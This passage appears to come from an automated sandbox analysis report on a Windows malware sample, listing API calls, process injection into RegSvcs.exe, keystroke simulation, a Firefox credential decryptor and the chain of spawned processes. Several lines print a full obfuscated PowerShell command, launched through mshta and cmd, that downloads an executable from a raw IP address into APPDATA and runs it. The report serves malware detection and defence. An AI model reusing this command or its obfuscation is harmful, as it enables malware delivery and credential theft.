                    Source: C:\Users\user\AppData\Roaming\cosse.exeCode function: 6_2_00103B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,6_2_00103B3A
                    Source: C:\Users\user\AppData\Roaming\cosse.exeCode function: 6_2_00135A7C EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,6_2_00135A7C
                    Source: C:\Users\user\AppData\Roaming\cosse.exeCode function: 6_2_00104B37 LoadLibraryA,GetProcAddress,6_2_00104B37
                    Source: C:\Users\user\AppData\Roaming\cosse.exeCode function: 6_2_00B82150 mov eax, dword ptr fs:[00000030h]6_2_00B82150
                    Source: C:\Users\user\AppData\Roaming\cosse.exeCode function: 6_2_00B837A0 mov eax, dword ptr fs:[00000030h]6_2_00B837A0
                    Source: C:\Users\user\AppData\Roaming\cosse.exeCode function: 6_2_00B83800 mov eax, dword ptr fs:[00000030h]6_2_00B83800
                    Source: C:\Users\user\AppData\Roaming\cosse.exeCode function: 6_2_001580C9 GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation,6_2_001580C9
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\AppData\Roaming\cosse.exeCode function: 6_2_0012A124 SetUnhandledExceptionFilter,6_2_0012A124
                    Source: C:\Users\user\AppData\Roaming\cosse.exeCode function: 6_2_0012A155 SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_0012A155
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMemory allocated: page read and write | page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Yara detected Powershell decode and execute
                    Source: Yara matchFile source: amsi32_5004.amsi.csv, type: OTHER
                    .NET source code references suspicious native API functions
                    Source: 6.2.cosse.exe.33b0000.1.raw.unpack, UltraSpeed.csReference to suspicious API methods: MapVirtualKey(VKCode, 0u)
                    Source: 6.2.cosse.exe.33b0000.1.raw.unpack, FFDecryptor.csReference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(hModule, method), typeof(T))
                    Source: 6.2.cosse.exe.33b0000.1.raw.unpack, FFDecryptor.csReference to suspicious API methods: hModuleList.Add(LoadLibrary(text9 + "\\mozglue.dll"))
                    Maps a DLL or memory area into another process
                    Source: C:\Users\user\AppData\Roaming\cosse.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and writeJump to behavior
                    Writes to foreign memory regions
                    Source: C:\Users\user\AppData\Roaming\cosse.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 342008Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\cosse.exeCode function: 6_2_001587B1 LogonUserW,6_2_001587B1
                    Source: C:\Users\user\AppData\Roaming\cosse.exeCode function: 6_2_00103B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,6_2_00103B3A
                    Source: C:\Users\user\AppData\Roaming\cosse.exeCode function: 6_2_001612C7 SendInput,keybd_event,6_2_001612C7
                    Source: C:\Users\user\AppData\Roaming\cosse.exeCode function: 6_2_00164C27 mouse_event,6_2_00164C27
                    Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/C poWErSheLL -Ex ByPass -NoP -w 1 -C DeViCECReDENtialdEplOyment ; iEx($(IEX('[SyStEM.teXt.encODiNG]'+[ChaR]58+[cHAR]0X3A+'Utf8.gETsTriNG([SYStEM.CoNvErt]'+[CHaR]0X3a+[chAR]58+'FROMbASE64STring('+[ChAR]34+'JG1xZ0doICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRkLXR5cGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbWJlckRlZkluSVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSTG1vbiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWlFtV1RvTyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVXlILHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMSix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGssSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENZYlJFKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJYeFBHb1lmdyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTUVzcGFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjRWkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkbXFnR2g6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xMDcuMTc0LjIzMS4yMTEvMzExL2Nzc29zLmV4ZSIsIiRFTnY6QVBQREFUQVxjb3NzZS5leGUiLDAsMCk7c1RhcnQtc0xlZVAoMyk7aU52b2tlLWl0ZW0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFbnY6QVBQREFUQVxjb3NzZS5leGUi'+[chAR]34+'))')))"Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe poWErSheLL -Ex ByPass -NoP -w 1 -C DeViCECReDENtialdEplOyment ; iEx($(IEX('[SyStEM.teXt.encODiNG]'+[ChaR]58+[cHAR]0X3A+'Utf8.gETsTriNG([SYStEM.CoNvErt]'+[CHaR]0X3a+[chAR]58+'FROMbASE64STring('+[ChAR]34+'JG1xZ0doICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRkLXR5cGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbWJlckRlZkluSVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSTG1vbiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWlFtV1RvTyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVXlILHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMSix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGssSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENZYlJFKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJYeFBHb1lmdyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTUVzcGFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjRWkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkbXFnR2g6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xMDcuMTc0LjIzMS4yMTEvMzExL2Nzc29zLmV4ZSIsIiRFTnY6QVBQREFUQVxjb3NzZS5leGUiLDAsMCk7c1RhcnQtc0xlZVAoMyk7aU52b2tlLWl0ZW0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFbnY6QVBQREFUQVxjb3NzZS5leGUi'+[chAR]34+'))')))"Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qrkmxxq1\qrkmxxq1.cmdline"Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\cosse.exe "C:\Users\user\AppData\Roaming\cosse.exe" Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES9E10.tmp" "c:\Users\user\AppData\Local\Temp\qrkmxxq1\CSCA5EBD89D883B423C8D6CB33CF6463C44.TMP"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\cosse.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Roaming\cosse.exe" Jump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" "/c powershell -ex bypass -nop -w 1 -c devicecredentialdeployment ; iex($(iex('[system.text.encoding]'+[char]58+[char]0x3a+'utf8.getstring([system.convert]'+[char]0x3a+[char]58+'frombase64string('+[char]34+'jg1xz0doicagicagicagicagicagicagicagicagicagicagicagid0gicagicagicagicagicagicagicagicagicagicagicagqwrklxr5cgugicagicagicagicagicagicagicagicagicagicagicaglu1fbwjlckrlzklusvrpt24gicagicagicagicagicagicagicagicagicagicagicagj1tebgxjbxbvcnqoinvstg1vbiisicagicagicagicagicagicagicagicagicagicagicagienoyxjtzxqgpsbdagfyu2v0llvuawnvzgupxxb1ymxpyybzdgf0awmgzxh0zxjuieludfb0cibvukxeb3dubg9hzfrvrmlszshjbnrqdhigicagicagicagicagicagicagicagicagicagicagicagwlftv1rvtyxzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicagvxlilhn0cmluzyagicagicagicagicagicagicagicagicagicagicagicbmsix1aw50icagicagicagicagicagicagicagicagicagicagicagigsssw50uhryicagicagicagicagicagicagicagicagicagicagicagienzyljfktsnicagicagicagicagicagicagicagicagicagicagicagic1uyu1ficagicagicagicagicagicagicagicagicagicagicagicjyefbhb1lmdyigicagicagicagicagicagicagicagicagicagicagicaglu5btuvzcgfdzsagicagicagicagicagicagicagicagicagicagicagicbjrwkgicagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagicakbxfnr2g6olvstervd25sb2fkvg9gawxlkdasimh0dha6ly8xmdcumtc0ljizms4ymtevmzexl2nzc29zlmv4zsisiirftny6qvbqrefuqvxjb3nzzs5leguildasmck7c1rhcnqtc0xlzvaomyk7au52b2tllwl0zw0gicagicagicagicagicagicagicagicagicagicagicagiirfbny6qvbqrefuqvxjb3nzzs5legui'+[char]34+'))')))"
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -ex bypass -nop -w 1 -c devicecredentialdeployment ; iex($(iex('[system.text.encoding]'+[char]58+[char]0x3a+'utf8.getstring([system.convert]'+[char]0x3a+[char]58+'frombase64string('+[char]34+'jg1xz0doicagicagicagicagicagicagicagicagicagicagicagid0gicagicagicagicagicagicagicagicagicagicagicagqwrklxr5cgugicagicagicagicagicagicagicagicagicagicagicaglu1fbwjlckrlzklusvrpt24gicagicagicagicagicagicagicagicagicagicagicagj1tebgxjbxbvcnqoinvstg1vbiisicagicagicagicagicagicagicagicagicagicagicagienoyxjtzxqgpsbdagfyu2v0llvuawnvzgupxxb1ymxpyybzdgf0awmgzxh0zxjuieludfb0cibvukxeb3dubg9hzfrvrmlszshjbnrqdhigicagicagicagicagicagicagicagicagicagicagicagwlftv1rvtyxzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicagvxlilhn0cmluzyagicagicagicagicagicagicagicagicagicagicagicbmsix1aw50icagicagicagicagicagicagicagicagicagicagicagigsssw50uhryicagicagicagicagicagicagicagicagicagicagicagienzyljfktsnicagicagicagicagicagicagicagicagicagicagicagic1uyu1ficagicagicagicagicagicagicagicagicagicagicagicjyefbhb1lmdyigicagicagicagicagicagicagicagicagicagicagicaglu5btuvzcgfdzsagicagicagicagicagicagicagicagicagicagicagicbjrwkgicagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagicakbxfnr2g6olvstervd25sb2fkvg9gawxlkdasimh0dha6ly8xmdcumtc0ljizms4ymtevmzexl2nzc29zlmv4zsisiirftny6qvbqrefuqvxjb3nzzs5leguildasmck7c1rhcnqtc0xlzvaomyk7au52b2tllwl0zw0gicagicagicagicagicagicagicagicagicagicagicagiirfbny6qvbqrefuqvxjb3nzzs5legui'+[char]34+'))')))"
                    Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" "/c powershell -ex bypass -nop -w 1 -c devicecredentialdeployment ; iex($(iex('[system.text.encoding]'+[char]58+[char]0x3a+'utf8.getstring([system.convert]'+[char]0x3a+[char]58+'frombase64string('+[char]34+'jg1xz0doicagicagicagicagicagicagicagicagicagicagicagid0gicagicagicagicagicagicagicagicagicagicagicagqwrklxr5cgugicagicagicagicagicagicagicagicagicagicagicaglu1fbwjlckrlzklusvrpt24gicagicagicagicagicagicagicagicagicagicagicagj1tebgxjbxbvcnqoinvstg1vbiisicagicagicagicagicagicagicagicagicagicagicagienoyxjtzxqgpsbdagfyu2v0llvuawnvzgupxxb1ymxpyybzdgf0awmgzxh0zxjuieludfb0cibvukxeb3dubg9hzfrvrmlszshjbnrqdhigicagicagicagicagicagicagicagicagicagicagicagwlftv1rvtyxzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicagvxlilhn0cmluzyagicagicagicagicagicagicagicagicagicagicagicbmsix1aw50icagicagicagicagicagicagicagicagicagicagicagigsssw50uhryicagicagicagicagicagicagicagicagicagicagicagienzyljfktsnicagicagicagicagicagicagicagicagicagicagicagic1uyu1ficagicagicagicagicagicagicagicagicagicagicagicjyefbhb1lmdyigicagicagicagicagicagicagicagicagicagicagicaglu5btuvzcgfdzsagicagicagicagicagicagicagicagicagicagicagicbjrwkgicagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagicakbxfnr2g6olvstervd25sb2fkvg9gawxlkdasimh0dha6ly8xmdcumtc0ljizms4ymtevmzexl2nzc29zlmv4zsisiirftny6qvbqrefuqvxjb3nzzs5leguildasmck7c1rhcnqtc0xlzvaomyk7au52b2tllwl0zw0gicagicagicagicagicagicagicagicagicagicagicagiirfbny6qvbqrefuqvxjb3nzzs5legui'+[char]34+'))')))"Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -ex bypass -nop -w 1 -c devicecredentialdeployment ; iex($(iex('[system.text.encoding]'+[char]58+[char]0x3a+'utf8.getstring([system.convert]'+[char]0x3a+[char]58+'frombase64string('+[char]34+'jg1xz0doicagicagicagicagicagicagicagicagicagicagicagid0gicagicagicagicagicagicagicagicagicagicagicagqwrklxr5cgugicagicagicagicagicagicagicagicagicagicagicaglu1fbwjlckrlzklusvrpt24gicagicagicagicagicagicagicagicagicagicagicagj1tebgxjbxbvcnqoinvstg1vbiisicagicagicagicagicagicagicagicagicagicagicagienoyxjtzxqgpsbdagfyu2v0llvuawnvzgupxxb1ymxpyybzdgf0awmgzxh0zxjuieludfb0cibvukxeb3dubg9hzfrvrmlszshjbnrqdhigicagicagicagicagicagicagicagicagicagicagicagwlftv1rvtyxzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicagvxlilhn0cmluzyagicagicagicagicagicagicagicagicagicagicagicbmsix1aw50icagicagicagicagicagicagicagicagicagicagicagigsssw50uhryicagicagicagicagicagicagicagicagicagicagicagienzyljfktsnicagicagicagicagicagicagicagicagicagicagicagic1uyu1ficagicagicagicagicagicagicagicagicagicagicagicjyefbhb1lmdyigicagicagicagicagicagicagicagicagicagicagicaglu5btuvzcgfdzsagicagicagicagicagicagicagicagicagicagicagicbjrwkgicagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagicakbxfnr2g6olvstervd25sb2fkvg9gawxlkdasimh0dha6ly8xmdcumtc0ljizms4ymtevmzexl2nzc29zlmv4zsisiirftny6qvbqrefuqvxjb3nzzs5leguildasmck7c1rhcnqtc0xlzvaomyk7au52b2tllwl0zw0gicagicagicagicagicagicagicagicagicagicagicagiirfbny6qvbqrefuqvxjb3nzzs5legui'+[char]34+'))')))"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\cosse.exeCode function: 6_2_00157CAF GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,6_2_00157CAF
                    Source: C:\Users\user\AppData\Roaming\cosse.exeCode function: 6_2_0015874B AllocateAndInitializeSid,CheckTokenMembership,FreeSid,6_2_0015874B
                    Source: cosse.exe, 00000006.00000002.968223248.00000000001B4000.00000002.00000001.01000000.0000000A.sdmp, cssos[1].exe.3.dr, cosse.exe.3.drBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                    Source: cosse.exeBinary or memory string: Shell_TrayWnd
                    Source: C:\Users\user\AppData\Roaming\cosse.exeCode function: 6_2_0012862B cpuid 6_2_0012862B
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
